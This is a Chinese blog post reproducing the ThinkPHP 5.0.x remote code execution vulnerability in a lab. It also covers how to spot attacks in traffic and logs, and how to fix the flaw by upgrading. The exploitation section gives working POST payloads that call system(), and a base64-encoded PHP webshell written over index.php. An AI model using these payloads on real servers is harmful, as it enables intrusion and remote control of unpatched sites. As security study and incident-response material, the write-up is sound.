ThinkPHP 5.0.5~5.0.23 远程代码执行漏洞复现及排查

已于 2023-08-11 17:31:59 修改
阅读量1.8k 收藏 2
点赞数
分类专栏: 渗透 应急响应 文章标签: 网络安全 安全 web安全 安全威胁分析
于 2023-08-11 17:29:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/youuzi/article/details/132236836
版权

目录

一、概述

二、影响范围及使用条件

三、漏洞利用

 四、应急分析

五、漏洞修复

一、概述

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

Thinphp团队在实现框架中的核心类Requests的method方法实现了表单请求类型伪装,默认为$_POST[‘_method’]变量,却没有对$_POST[‘_method’]属性进行严格校验,可以通过变量覆盖掉Requets类的属性并结合框架特性实现对任意函数的调用达到任意代码执行的效果。

二、影响范围及使用条件

1、范围

受影响版本:Think PHP 5.0.0-5.0.23
不受影响版本:Think PHP 5.0.24

2、利用条件

版本名是否可被攻击攻击条件
5.0.0
5.0.1
5.0.2
5.0.3
5.0.4
5.0.5
5.0.6
5.0.7
5.0.8无需开启debug
5.0.9无需开启debug
5.0.10无需开启debug
5.0.11无需开启debug
5.0.12无需开启debug
5.0.13需开启debug
5.0.14需开启debug
5.0.15需开启debug
5.0.16需开启debug
5.0.17需开启debug
5.0.18需开启debug
5.0.19需开启debug
5.0.20
5.0.21需开启debug
5.0.22需开启debug
5.0.23需开启debug

三、漏洞利用

1、漏洞poc,网页上构造post包:

利用点:
http://192.168.52.131:8080/index.php?s=captcha

data部分:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

或者:
_method=__construct&filter[]=system&method=get&get[]=pwd

2、使用burpsuite抓包分析,成功响应

3、这里如何getshell呢?

(1)通过覆盖index.php文件内容的方式(因为这里是一定存在index.php文件的,但是存在风险,一旦覆盖后又无法利用,会导致漏洞无法使用)

因为存在过滤,这里我们使用base64加密数据写入shell,同时eval函数没法注入,这里选择assert函数。

#postdata数据
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ2FkbWluJ10pOz8+YmJi== | base64 -d > index.php

 使用蚁剑连接shell,注意要选择char16和base64

 (2)或者选择建立一个新的文件,将内容写入新文件中(建议)

#POST数据:
_method=__construct&filter[]=system&method=get&get[]=echo  "<?php phpinfo();  >"  > test.php

 四、应急分析

那么,在遭受攻击时,我们可以通过哪些角度去分析是否遭受攻击呢?

1、从流量侧分析

如果存在流量监控软件的话,通过分析流量包是可以监测还原整个攻击流程的。

在如下数据包中,发现攻击者先用ls探测了服务器根目录下有哪些文件,由于回包是分块传输,看起来不怎么友好,但是还是能知道是利用成功的

POST /index.php?s=captcha HTTP/1.1
Host: 192.168.52.131:8080
Content-Length: 63
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.52.131:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.52.131:8080/index.php?s=captcha
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

探测完当前目录的文件后,开始查看当前路径

接下来是尝试写入phpinfo脚本文件

总体来说,从流量侧是可以排查到攻击路径的。

2、从日志侧分析

如果没有其他可利用的设备,那么web本身的日志文件是个很重要的排查依据。

因为我这里是docker搭建的靶场环境,所以并没有保存对应的日志文件。正常来说是access.log和/var/www/runtime/log/下文件,里面包含时间,来源IP、URL、请求方式(get、post、put等)、包大小、状态码。

五、漏洞修复

 升级到5.0.24及以上,不用开启debug模式。

ThinkPHP5.0.5完整版_ThinkPHP_full_v5.0.5
02-24
ThinkPHP5.0.5完整版_ThinkPHP_full_v5.0.5 欢迎关注PHP学习博客:http://blog.youkuaiyun.com/column/details/14209.html
实战:通过tp5.0.5漏洞入侵企业网站
weixin_44763740的博客
07-24 926
下一步就是使用蚁剑连接webshell,看到这里,大家都以为可以直接getshell了吧,但是命运就是这么捉弄人,明明已经将木马包含在日志中,并且有绝对路径,相关函数也没有禁用,这一切看起来都是那么顺利,可就是连接失败。后来我又尝试换冰蝎马,但是因上传做了字符串限制,只能用最简单的一句话木马,其余多一个字符串都会被截掉,那么会不会是编码器的问题呢?以上可知,木马已存在,且路径正确,那一定是连接出问题了。我是身上有点执念的,为了梦想也好,目标也罢,有时候,你不去较劲儿,永远不知道自己能改变什么。
ThinkPHP5_RCE
最新发布
Dikesi的博客
02-10 346
ThinkPHP 5.x版本 RCE漏洞
ThinkPHP V5.0.5漏洞_ThinkPHP漏洞分析与利用
weixin_39602280的博客
11-19 2698
一、组件介绍1.1 基本信息ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,遵循Apache 2开源协议发布,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL...
Thinkphp5.0.x 文件包含漏洞
weixin_61785633的博客
07-30 809
这个漏洞复现的不是很完善,按网上的教程,传入图片码是可以被解析为php文件,从而实现攻击,但是我尝试了几次都不成功,目前还不知道是为什么。
ThinkPHP5.0.x远程执行漏洞分析复现
qq_74148743的博客
05-11 1605
2018年12月10日,ThinkPHPv5系列发布安全更新,修复了一处可导致远程代码执行的严重漏洞。此次漏洞ThinkPHP v5框架代码问题引起,其覆盖面广,且可直接远程执行任何代码和命令。电子商务行业、金融服务行业、互联网游戏行业等网站使用该ThinkPHP框架比较多,需要格外关注。由于ThinkPHP v5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接进行远程代码执行,进而获得服务器权限。
[复现]Thinkphp5系列漏洞
kuuhh的博客
08-05 7284
SQL注入 parseData方法 本次漏洞存在于 Builder 类的 parseData 方法中。由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生。漏洞影响版本: 5.0.13<=ThinkPHP<=5.0.15 、 5.1.0<=ThinkPHP<=5.1.5 。 测试代码,我这里用的版本是 ThinkPHP 5.0.15 public function index() { update / insert 方法
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE)漏洞,该漏洞允许攻击者在服务器上执行任意代码。 该漏洞是由于 ThinkPHP 的路由机制存在缺陷,攻击者可以通过构造特殊的 URL 来...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架,它提供了丰富的功能和良好的性能。然而,如同任何复杂的软件系统一样,它也存在安全漏洞。本次分析的焦点集中在...
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP V5.0.5漏洞_ThinkPHP5丨远程代码执行漏洞动态分析
weixin_39756192的博客
11-19 1248
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,在保持出色的性能和至简代码的同时,也注重易用性。但是简洁易操作也会出现漏洞,之前ThinkPHP官方修复了一个严重的远程代码执行漏洞。这个漏洞的主要原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令,受影响的版本包括5.0和5.1版本。那么今天i春秋用动态分析法来介绍远...
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 9889
ThinkPHP5系列远程代码执行漏洞复现(详细)
[代码审计]ThinkPHP5的文件包含漏洞
姜小孩的博客
06-14 1274
目录漏洞影响范围漏洞分析POC我复现用的是5.1.15环境配置要将将 application/index/controller/Index.php 文件代码设置如下: 创建 application/index/view/index/index.html 文件,内容随意(没有这个模板文件的话,在渲染时程序会报错)先跟进assign方法再跟进array_merge() 函数用于把一个或多个数组合并为一个数组。只是赋值操作,跟进下面的fetch继续跟进用于引用当前对象。用于引用当前类。换句话说, 用于非静态成
网络安全---渗透测试---框架漏洞-ThinkPHP5.0、Struts2
weixin_52796034的博客
11-05 1066
反弹shell(Reverse Shell)是一种计算机安全和网络攻击技术,通常被用于与远程目标系统建立命令行交互式连接。这个连接允许攻击者在远程系统上执行命令,获取系统访问权限,以及进行横向移动和数据操作。反弹shell的工作方式如下:攻击者和目标系统之间建立连接:通常,攻击者首先在目标系统上部署一个恶意程序(例如Trojan或后门),该程序会与攻击者的控制服务器建立连接。目标系统反弹连接:一旦恶意程序在目标系统上执行,它会尝试与攻击者的控制服务器建立连接。
ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路
shelter1234567的博客
01-16 2235
本节我将分析thinkphp5.0.x 版本的RCE漏洞,根据漏洞的研究模拟挖掘此漏洞的思路
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2682
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
ThinkPHP 系列漏洞
SHELLCODE_8BIT的博客
11-18 4390
所有 sql 注入漏洞均在 library/think/db/Builder.php 文件中。1、thinkphp5 SQL注入1漏洞影响版本: 5.0.13
ThinkPHP 5.0远程命令执行漏洞分析复现
weixin_35771144的博客
02-27 1136
0x00 前言   ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。 0x01 影响范围 ThinkPHP 5.0.5-5.0.22 ThinkPHP 5.1...
redis击穿 互斥锁
09-07
在处理Redis缓存击穿问题时,可以采用互斥锁的方式进行解决。互斥锁是一种机制,用于保护共享资源的访问,确保同一时刻只有一个线程能够获取锁来执行操作。在Redis缓存击穿的场景中,当一个高并发的请求发生时,如果缓存中不存在所需的数据,那么这个请求就会触发数据库的查询操作。 针对这种情况,我们可以引入互斥锁的概念来解决Redis缓存击穿问题。具体做法是,在查询缓存之前,先尝试获取互斥锁。如果获取到了锁,表示当前线程是第一个发起请求的线程,它可以继续执行查询数据库的操作,并将结果写入缓存。而其他线程在获取锁之前,只能等待一段时间后再次尝试获取锁。 为了实现这个逻辑,我们可以定义获取互斥锁的方法和释放锁的方法。获取互斥锁的方法可以使用Redis提供的setIfAbsent()方法来进行操作,设置一个键值对,如果该键不存在,则设置成功,并返回true;否则,返回false。释放锁的方法则是删除相应的键值对。 通过使用互斥锁,能够在高并发的情况下有效地控制对数据库的访问,避免出现缓存击穿的问题。这种方案在逻辑上实现了对缓存穿透和击穿的处理,并且可以封装为一个工具类,适用于各种场景。 引用内容: 代码片段,定义了获取互斥锁和释放锁的方法 Redis缓存穿透和击穿的处理方案 描述了使用互斥锁来解决缓存击穿问题的过程 提到了缓存击穿问题的本质和影响,引用了一个Redis教程中的PPT内容<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值